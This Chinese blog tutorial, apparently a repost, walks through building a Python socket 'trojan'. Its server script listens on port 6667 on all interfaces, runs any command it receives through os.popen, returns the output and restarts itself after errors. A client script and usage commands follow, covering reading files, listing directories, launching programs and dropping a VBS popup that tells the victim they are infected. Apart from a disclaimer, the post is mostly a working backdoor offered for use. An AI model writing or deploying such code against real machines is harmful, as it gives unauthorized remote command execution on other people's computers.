Python Socket实现远程木马弹窗详解

作者:共黄昏 时间:2022-11-28 10:04:39 

严正声明:本文仅限于技术讨论,严禁用于其他用途。

基础知识

  • socket通信模块:针对TCP/IP协议簇进行的程序封装,在Windows/Linux均有这样底层模块。

  • Unicode 有多种存储方式,常见的有 UTF-8、UTF-16、UTF-32,它们分别用不同的二进制格式来表示 Unicode 字符

  • 如果全部英文或英文与其他文字混合,但英文占绝大部分,用UTF-8就比UTF-16节省了很多空间.而如果全部是中文这样类似的字符或者混合字符中中文占绝大多数.UTF-16就占优势了,可以节省很多空间

编码:

  • 英文多:建议用UTF-8编码(utf-8是使用最多的编码方式,是一种变长字符编码)

  • 中文多:建议用UTF-16编码

  • 中文:window中文采用的是GBK格式编码

netstat -ant :只显示传输层的数据 TCP,UDP连接,可以用来检查socket服务是否起了

Python Socket实现远程木马弹窗详解

服务端(server)程序

import socket, os
def attack():
   try:
       s = socket.socket()
       s.bind(('0.0.0.0', 6667)) #   使用缺省地址,所有设备均可访问该服务器的6667端口
       s.listen()     #    对6667端口进行监听
       chanel, client = s.accept() #   进入阻塞状态,accept() 返回元组,接受来自客户端的数据,chanel:新的socket对象用于标识出服务器和哪个客户端连接进行通信,  client: 客户端的IP和端口
       while True:
           receive = chanel.recv(1024).decode()
           reply = os.popen(receive).read()
           chanel.send(f"命令{receive}的运行结果:\n{reply}".encode())
   except:
       s.close()
       attack()
if __name__ == '__main__':
   attack()

客户端(client)程序

import socket
s = socket.socket()
s.connect(('192.168.137.1', 6667))#192.168.137.1是socket服务器的地址
while True:
   sendstr = input("请输入消息:")
   s.send(sendstr.encode())
   receive = s.recv(1024).decode()
   print(f"服务器回复:{receive}")
   # s.close()

其他命令执行函数

提示:需要导入 os 模块—— import os

os.system('ipconfig')

os.popen('ipconfig').read()

eval()        # 将字符串按照Python代码来执行

该木马程序的基本用法

1、查看文件内容

window

type 文件绝对路径

linux

cat 文件路径

2、查看文件目录

window

dir                #查看当前文件路径目录
dir 文件路径     #查看指定文件路径目录

linux

ls                #查看当前文件路径目录
ll                #查看当前文件路径目录详细信息
ls 文件路径         #查看指定文件路径目录
ll 文件路径         #查看指定文件路径目录详细信息

3、创建文件或目录

windows

echo test >> demo.txt    #创建一个demo.txt文件,文件内容为 test

linux

mkdir 路径    #创建目录
echo test >> demo.txt    #创建一个demo.txt文件,文件内容为 test

4、调用windows应用程序

调用计算器

calc.exe

Python Socket实现远程木马弹窗详解

调用其他引用程序

直接输入应用程序绝对路径

5、调用Windows弹窗

echo msgbox("你中木马了!!")  > E:\hi.vbs    
E:\hi.vbs

Python Socket实现远程木马弹窗详解

来源:https://blog.csdn.net/weixin_49472648/article/details/125308268

标签:Python,Socket,木马弹窗
0
投稿

猜你喜欢

  • python进度条显示之tqmd模块

    2021-09-29 22:44:36
  • 如果用JS得到字符串中出现次数最多的字母

    2007-12-03 21:01:00
  • Python matplotlib图例放在外侧保存时显示不完整问题解决

    2023-10-08 14:05:35
  • ThinkPHP框架下微信支付功能总结踩坑笔记

    2024-05-02 17:13:41
  • 用Python创建声明性迷你语言的教程

    2023-08-10 04:49:42
  • 识别操作系统是不是vista的js代码

    2013-10-20 19:08:25
  • python解析xml文件方式(解析、更新、写入)

    2022-03-07 05:19:01
  • python获取本机所有IP地址的方法

    2022-08-01 16:38:55
  • django 读取图片到页面实例

    2023-02-22 13:30:50
  • 实现像php一样方便的go ORM数据库操作示例详解

    2024-05-05 09:27:25
  • asp正则表达式在网页处理中的应用四则

    2008-02-24 14:44:00
  • 使用go module导入本地包的方法教程详解

    2024-03-26 01:44:43
  • Javascript DOM 编程实例讲解--仿LightBox效果提示框

    2008-05-01 13:25:00
  • Python 共享变量加锁、释放详解

    2022-08-25 09:19:26
  • MySQL查询性能优化索引下推

    2024-01-24 15:43:01
  • Python3.7实现中控考勤机自动连接

    2022-08-07 16:24:22
  • Python如何实现FTP功能

    2021-10-22 15:08:25
  • Python绑定方法与非绑定方法详解

    2021-04-12 00:20:19
  • JavaScript实现Ajax总结

    2024-05-06 10:08:28
  • python中GIL的原理及用法总结

    2023-03-11 07:43:13
  • asp之家 网络编程 m.aspxhome.com